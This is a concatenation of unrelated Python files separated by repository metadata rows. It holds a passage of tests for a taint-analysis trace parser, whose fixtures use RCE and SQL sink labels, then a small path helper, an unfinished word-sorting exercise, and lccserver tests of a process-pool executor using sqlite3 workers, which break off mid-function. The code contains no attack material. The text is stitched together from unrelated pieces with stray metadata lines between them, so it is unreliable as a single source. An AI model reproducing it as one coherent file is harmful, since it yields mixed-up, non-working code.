type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_other_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Direct sink with ports on leaves (e.g., cross-repo).
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(y)[attribute]",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{
"kind": "RCE",
"name": "_remote_code_execution"
},
{
"kind": "RCE",
"name": "_cross_repo",
"port": "producer:1:formal(x)"
},
{
"kind": "SQL",
"name": "_cross_repo",
"port": "producer:1:formal(x)"
},
{
"kind": "RCE",
"name": "_cross_repo_other",
"port": "producer:1:formal(x)"
},
{
"kind": "RCE",
"name": "_cross_repo",
"port": "producer:2:formal(x)"
}
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(y)[attribute]",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0), ("SQL", 0)],
caller_port="formal(y)[attribute]",
callee_port="producer:1:formal(x)",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_cross_repo_other",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(y)[attribute]",
callee_port="producer:1:formal(x)",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(y)[attribute]",
callee_port="producer:2:formal(x)",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Indirect sink.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.sink"
],
"port": "formal(y)[attribute]",
"length": 2
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "RCE", "name": "_sink_leaf" },
{ "kind": "SQL", "name": "_sink_leaf" }
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.sink",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 2), ("SQL", 2)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
)
],
)
# Indirect sink with multiple callees.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.sink",
"foo.other_sink"
],
"port": "formal(y)[attribute]",
"length": 2
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "RCE", "name": "_sink_leaf" },
{ "kind": "SQL", "name": "_sink_leaf" }
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.sink",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 2), ("SQL", 2)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.other_sink",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 2), ("SQL", 2)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Mix of direct and indirect sinks.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"leaves": [
{ "kind": "RCE", "name": "_remote_code_execution" }
],
"features": [ { "always-via": "direct-sink" } ]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"resolves_to": [
"foo.sink"
],
"port": "formal(y)[attribute]",
"length": 2
},
"tito": [
{ "line": 110, "start": 111, "end": 112 },
{ "line": 113, "start": 114, "end": 115 }
],
"leaves": [
{ "kind": "RCE", "name": "_remote_code_execution" }
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.sink",
callee_location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
filename="foo.py",
titos=[
SourceLocation(line_no=110, begin_column=112, end_column=112),
SourceLocation(line_no=113, begin_column=115, end_column=115),
],
leaves=[("RCE", 2)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# User-declared return sink.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "result",
"taint": [
{
"decl": null,
"leaves": [ { "kind": "RCE" } ],
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
}
""",
expected=[],
)
# Implicit sink.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"leaves": [ { "kind": "RCE" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="leaf",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
],
)
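# The v3 sink cases repeat the v2 scenarios using the "kinds"-based layout, so
# per-kind "length" values show up as the expected leaf distances.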
def testSinkModelV3(self) -> None:
# User-declared sink.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"decl": null,
"kinds": [
{
"kind": "RCE",
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
]
}
}
""",
expected=[],
)
# Direct sink.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"local_features": [ { "always-via": "local-sink" } ],
"kinds": [
{
"kind": "SQL",
"leaves": [ { "name": "_sql" } ],
"features": [ { "always-via": "direct-sink" } ]
},
{
"kind": "RCE",
"leaves": [ { "name": "_sql" } ],
"features": [ { "always-via": "other-direct-sink" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_sql",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("SQL", 0), ("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[ParseTraceFeature("always-via:local-sink", [])],
annotations=[],
)
],
)
# Direct sink with multiple leaves.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "RCE",
"leaves": [
{ "name": "_remote_code_execution" },
{ "name": "_other_remote_code_execution" }
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_other_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Direct sink with ports on leaves (e.g., cross-repo).
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(y)[attribute]",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "RCE",
"leaves": [
{
"name": "_remote_code_execution"
},
{
"name": "_cross_repo",
"port": "producer:1:formal(x)"
},
{
"name": "_cross_repo_other",
"port": "producer:1:formal(x)"
},
{
"name": "_cross_repo",
"port": "producer:2:formal(x)"
}
],
"features": [ { "always-via": "direct-sink" } ]
},
{
"kind": "SQL",
"leaves": [
{
"name": "_cross_repo",
"port": "producer:1:formal(x)"
}
],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(y)[attribute]",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0), ("SQL", 0)],
caller_port="formal(y)[attribute]",
callee_port="producer:1:formal(x)",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_cross_repo_other",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(y)[attribute]",
callee_port="producer:1:formal(x)",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_cross_repo",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(y)[attribute]",
callee_port="producer:2:formal(x)",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Indirect sink.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.sink"
],
"port": "formal(y)[attribute]"
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "RCE",
"length": 2,
"leaves": [ { "name": "_sink_leaf" } ],
"features": [ { "always-via": "direct-sink" } ]
},
{
"kind": "SQL",
"length": 3,
"leaves": [ { "name": "_sink_leaf" } ],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.sink",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 2), ("SQL", 3)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
)
],
)
# Indirect sink with multiple callees.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"call": {
"position": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"resolves_to": [
"foo.sink",
"foo.other_sink"
],
"port": "formal(y)[attribute]"
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "RCE",
"length": 2,
"leaves": [ { "name": "_sink_leaf" } ],
"features": [ { "always-via": "direct-sink" } ]
},
{
"kind": "SQL",
"length": 3,
"leaves": [ { "name": "_sink_leaf" } ],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.sink",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 2), ("SQL", 3)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.other_sink",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 2), ("SQL", 3)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# Mix of direct and indirect sinks.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"tito": [
{ "line": 10, "start": 11, "end": 12 },
{ "line": 13, "start": 14, "end": 15 }
],
"kinds": [
{
"kind": "RCE",
"leaves": [ { "name": "_remote_code_execution" } ],
"features": [ { "always-via": "direct-sink" } ]
}
]
},
{
"call": {
"position": {
"filename": "foo.py",
"line": 100,
"start": 101,
"end": 102
},
"resolves_to": [
"foo.sink"
],
"port": "formal(y)[attribute]"
},
"tito": [
{ "line": 110, "start": 111, "end": 112 },
{ "line": 113, "start": 114, "end": 115 }
],
"kinds": [
{
"kind": "RCE",
"length": 2,
"leaves": [ { "name": "_remote_code_execution" } ],
"features": [ { "always-via": "direct-sink" } ]
}
]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="_remote_code_execution",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[
SourceLocation(line_no=10, begin_column=12, end_column=12),
SourceLocation(line_no=13, begin_column=15, end_column=15),
],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="foo.sink",
callee_location=SourceLocation(
line_no=100,
begin_column=102,
end_column=102,
),
filename="foo.py",
titos=[
SourceLocation(line_no=110, begin_column=112, end_column=112),
SourceLocation(line_no=113, begin_column=115, end_column=115),
],
leaves=[("RCE", 2)],
caller_port="formal(x)",
callee_port="formal(y)[attribute]",
type_interval=None,
features=[],
annotations=[],
),
],
)
# User-declared return sink.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "result",
"taint": [
{
"decl": null,
"kinds": [
{
"kind": "RCE",
"features": [ { "always-via": "user-declared" } ]
}
]
}
]
}
]
}
}
""",
expected=[],
)
# Implicit sink.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"callable": "foo.bar",
"sinks": [
{
"port": "formal(x)",
"taint": [
{
"root": {
"filename": "foo.py",
"line": 1,
"start": 2,
"end": 3
},
"kinds": [ { "kind": "RCE" } ]
}
]
}
]
}
}
""",
expected=[
ParseConditionTuple(
type=ParseType.PRECONDITION,
caller="foo.bar",
callee="leaf",
callee_location=SourceLocation(
line_no=1,
begin_column=3,
end_column=3,
),
filename="foo.py",
titos=[],
leaves=[("RCE", 0)],
caller_port="formal(x)",
callee_port="sink",
type_interval=None,
features=[],
annotations=[],
),
],
)
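# Model entries that only carry modes, sanitizers or tito summaries contribute
# no pre- or postconditions, so the parser is expected to return nothing.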
def testIgnoreModelsV2(self) -> None:
# Ignore modes.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"modes": [ "Obscure" ]
}
}
""",
expected=[],
)
# Ignore sanitizers.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"global_sanitizer": { "sources": "All" }
}
}
""",
expected=[],
)
# Ignore tito.
self.assertParsed(
version=2,
input="""
{
"kind": "model",
"data": {
"tito": [
{
"port": "formal(value)",
"taint": [
{
"decl": null,
"leaves": [
{ "kind": "LocalReturn", "name": "[instance]", "depth": 0 },
{ "kind": "LocalReturn", "name": "[attribute]", "depth": 0 }
]
}
]
}
]
}
}
""",
expected=[],
)
def testIgnoreModelsV3(self) -> None:
# Ignore modes.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"modes": [ "Obscure" ]
}
}
""",
expected=[],
)
# Ignore sanitizers.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"global_sanitizer": { "sources": "All" }
}
}
""",
expected=[],
)
# Ignore tito.
self.assertParsed(
version=3,
input="""
{
"kind": "model",
"data": {
"tito": [
{
"port": "formal(value)",
"taint": [
{
"decl": null,
"kinds": [
{
"kind": "LocalReturn",
"return_paths": ["[instance]", "[attribute]"]
}
]
}
]
}
]
}
}
""",
expected=[],
)
| 78ac9a9d5d89f65ca395f33c0537ada5d6af12a0 | 96 | py | Python | tests/__init__.py | markfink/korg | 6a123031b69896f61fe0007f4a1d5f6f064b6ad9 | ["MIT"] | 2 | 2020-01-18T10:32:13.000Z | 2020-01-18T10:34:17.000Z |
import os

def here(p):
    # Return the absolute path of p, resolved relative to the directory
    # containing this file.
    return os.path.abspath(os.path.join(os.path.dirname(__file__), p))
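# Example usage (hypothetical file name): here('data/sample.txt') resolves to
# the absolute path of tests/data/sample.txt, regardless of the working
# directory from which the tests are run.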
| 78cacfed10f46dc69a7f2e10fde0582841077022 | 214 | py | Python | main.py | openhomeschool/sorter1 | 5a4224e85739b5d227de7b74c08dfc3c6f25a7b6 | ["MIT"] |
def sort(words):
    # write your code here...
    return

print(sort(['hi', 'bye']))
print(sort(['abc', 'def']))
print(sort(['hi', 'bye', 'def', 'abc']))
print(sort(['add', 'some', 'more', 'words', 'here!']))
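# One possible completion of the exercise above (a sketch, assuming plain
# lexicographic ordering is what is wanted):
#
#     def sort(words):
#         return sorted(words)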
| 15329a447268086d1c10f64723c1d182ed67d28a | 16,143 | py | Python | lccserver/tests/test_utils.py | waqasbhatti/lcc-server | b8256bf28aee42e628abe27f0203d6f5361fb84b | ["MIT"] | 3 | 2018-08-24T04:01:36.000Z | 2021-04-21T16:25:04.000Z | 7 | 2018-08-24T11:50:20.000Z | 2019-03-09T03:58:00.000Z | 1 | 2020-06-01T07:55:16.000Z | 2020-06-01T07:55:16.000Z |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''test_utils.py - Waqas Bhatti (wbhatti@astro.princeton.edu) - Aug 2018
License: MIT - see the LICENSE file for the full text.
This tests the lccserver.utils module.
'''
import lccserver.utils as lcu
import multiprocessing as mp
from concurrent.futures import as_completed
import time
import random
import sqlite3
import tempfile
import os
import os.path
################
## Basic test ##
################
def initializer_func(test_string):
'''This is the initializer function that places a string at process global
scope.
'''
global i_am_global
i_am_global = test_string
def worker_func(input_param):
'''
This sleeps for random seconds between 1 and 3, then returns.
'''
global i_am_global
time.sleep(random.randrange(1,3))
return "%s|%s" % (i_am_global, input_param)
def test_ProcExecutor():
'''
This tests our local ProcExecutor instance to see if it works correctly.
'''
ncpus = mp.cpu_count()
print('CPUS: %s' % ncpus)
executor = lcu.ProcExecutor(
max_workers=ncpus,
initializer=initializer_func,
initargs=('glob glob glob',)
)
print('executor up OK: %r' % executor)
tasks = [x for x in 'abcdefghijklmnopqrstuvwxyz']
print('tasks: %r' % tasks)
futures = [executor.submit(worker_func, x) for x in tasks]
results = []
print('submitted all tasks')
for f in as_completed(futures):
results.append(f.result())
assert len(results) == len(tasks), "Number of results == number of tasks"
for r in results:
rx = r.split('|')
assert rx[0] == 'glob glob glob', "The proc-global var is present"
assert rx[1] in tasks, "Actual func args was passed in successfully"
executor.shutdown()
#################################################################
## Test using multiprocessing.current_process() to store stuff ##
#################################################################
def initializer_func_procstorage(test_string):
'''This is the initializer function that places a string at process global
scope.
'''
thisproc = mp.current_process()
thisproc.local_proc_store = test_string
def worker_func_procstorage(input_param):
'''
This sleeps for random seconds between 1 and 3, then returns.
'''
thisproc = mp.current_process()
time.sleep(random.randrange(1,3))
return "%s|%s" % (thisproc.local_proc_store, input_param)
def test_ProcExecutor_procstorage():
'''
This tests our local ProcExecutor instance to see if it works correctly.
'''
ncpus = mp.cpu_count()
print('CPUS: %s' % ncpus)
executor = lcu.ProcExecutor(
max_workers=ncpus,
initializer=initializer_func_procstorage,
initargs=('glob glob glob',)
)
print('executor up OK: %r' % executor)
tasks = [x for x in 'abcdefghijklmnopqrstuvwxyz']
print('tasks: %r' % tasks)
futures = [executor.submit(worker_func_procstorage, x) for x in tasks]
results = []
print('submitted all tasks')
for f in as_completed(futures):
results.append(f.result())
assert len(results) == len(tasks), "Number of results == number of tasks"
for r in results:
rx = r.split('|')
assert rx[0] == 'glob glob glob', "The proc-global var is present"
assert rx[1] in tasks, "Actual func args was passed in successfully"
executor.shutdown()
################################################################
## Test using the finalizer arg to do stuff when workers exit ##
################################################################
from datetime import datetime
import glob
def initializer_func_finalizer(test_string):
'''This is the initializer function that places a string at process global
scope.
'''
thisproc = mp.current_process()
thisproc.local_proc_store = test_string
def worker_func_finalizer(input_param):
'''
This sleeps for random seconds between 1 and 3, then returns.
'''
thisproc = mp.current_process()
time.sleep(random.randrange(1,3))
return "%s|%s" % (thisproc.local_proc_store, input_param)
def finalizer_func():
'''
This gets called right before the worker is ready to exit.
'''
thisproc = mp.current_process()
with open('worker-done-%s.txt' % thisproc.name,'w') as outfd:
outfd.write("Yay! I'm done!\n")
outfd.write('worker shutdown called at: %s\n' %
datetime.utcnow().isoformat())
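# The finalizer runs once in each worker just before it exits, so every worker
# leaves behind a 'worker-done-<process name>.txt' marker file that the test
# below collects and verifies.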
def test_ProcExecutor_finalizer():
'''
This tests our local ProcExecutor instance to see if it works correctly.
'''
ncpus = mp.cpu_count()
print('CPUS: %s' % ncpus)
executor = lcu.ProcExecutor(
max_workers=ncpus,
initializer=initializer_func_finalizer,
initargs=('glob glob glob',),
finalizer=finalizer_func,
)
print('executor up OK: %r' % executor)
tasks = [x for x in 'abcdefghijklmnopqrstuvwxyz']
print('tasks: %r' % tasks)
futures = [executor.submit(worker_func_finalizer, x) for x in tasks]
results = []
print('submitted all tasks')
for f in as_completed(futures):
results.append(f.result())
assert len(results) == len(tasks), "Number of results == number of tasks"
for r in results:
rx = r.split('|')
assert rx[0] == 'glob glob glob', "The proc-global var is present"
assert rx[1] in tasks, "Actual func args was passed in successfully"
executor.shutdown()
with open('executor-shutdown.txt','w') as outfd:
outfd.write('executor shutdown at: %s\n' %
datetime.utcnow().isoformat())
# now we'll check if the result files were generated correctly
worker_results = glob.glob(os.path.join(os.getcwd(),
'worker-done-*.txt'))
assert len(worker_results) == ncpus, "All workers cleaned up correctly"
for wrkres in worker_results:
with open(wrkres,'r') as infd:
assert "Yay! I'm done!" in infd.read(), "Clean up result OK"
os.remove(wrkres)
assert os.path.exists(os.path.join(os.getcwd(), 'executor-shutdown.txt'))
os.remove(os.path.join(os.getcwd(), 'executor-shutdown.txt'))
#############################################
## More involved ProcessPoolExecutor tests ##
#############################################
def database_initializer(database_fpath):
global db_connection
db_connection = sqlite3.connect(database_fpath)
def database_worker(task):
global db_connection
cursor = db_connection.cursor()
query, params = task
time.sleep(random.randrange(1,2))
cursor.execute(query, (params,))
row = cursor.fetchone()
return params, row[0]
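# Pattern under test: each worker process opens its own sqlite3 connection in
# database_initializer and reuses it for every task through the module-level
# global, so no connection is ever shared across processes.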
def test_background_sqlite3():
'''This tests if the persistent DB connections work correctly in background
workers.
'''
temp_fd, temp_fname = tempfile.mkstemp()
conn = sqlite3.connect(temp_fname)
cursor = conn.cursor()
# from https://github.com/jalapic/engsoccerdata
# /blob/master/data-raw/teamnames.csv
data = [
(1,"England","Sutton United","Sutton United"),
(2,"England","Aberdare Athletic","Aberdare Athletic"),
(3,"England","Accrington","Accrington"),
(4,"England","Accrington F.C.","Accrington"),
(5,"England","AFC Bournemouth","AFC Bournemouth"),
(6,"England","AFC Wimbledon","AFC Wimbledon"),
(7,"England","Aldershot","Aldershot Tn."),
(8,"England","Arsenal","Arsenal"),
(9,"England","Aston Villa","Aston Villa"),
]
queries_params_results = [
('select country from team_names where serial = ?',
4,
'England'),
('select team_name from team_names where team_name = ?',
'Arsenal',
'Arsenal'),
('select alt_team_name from team_names where team_name = ?',
'Aldershot',
'Aldershot Tn.'),
('select serial from team_names where team_name = ?',
'Aston Villa',
9),
]*5
param_result_dict = {x[1]:x[2] for x in queries_params_results}
cursor.execute(
"create table team_names ("
"serial integer, country text, team_name text, alt_team_name text"
")"
)
cursor.executemany("insert into team_names values (?,?,?,?)", data)
conn.commit()
conn.close()
ncpus = mp.cpu_count()
print('CPUS: %s' % ncpus)
executor = lcu.ProcExecutor(
max_workers=4,
initializer=database_initializer,
initargs=(temp_fname,)
)
print('executor up OK: %r' % executor)
tasks = [(x[0], x[1]) for x in queries_params_results]
futures = [executor.submit(database_worker,task) for task in tasks]
results = []
for f in as_completed(futures):
results.append(f.result())
for res in results:
input_param, returned = res
assert returned == param_result_dict[input_param], "Result matches"
executor.shutdown()
os.remove(temp_fname)
###################################################################
## Testing sqlite3 background workers with process-local storage ##
###################################################################
def database_initializer_procstorage(database_fpath):
thisproc = mp.current_process()
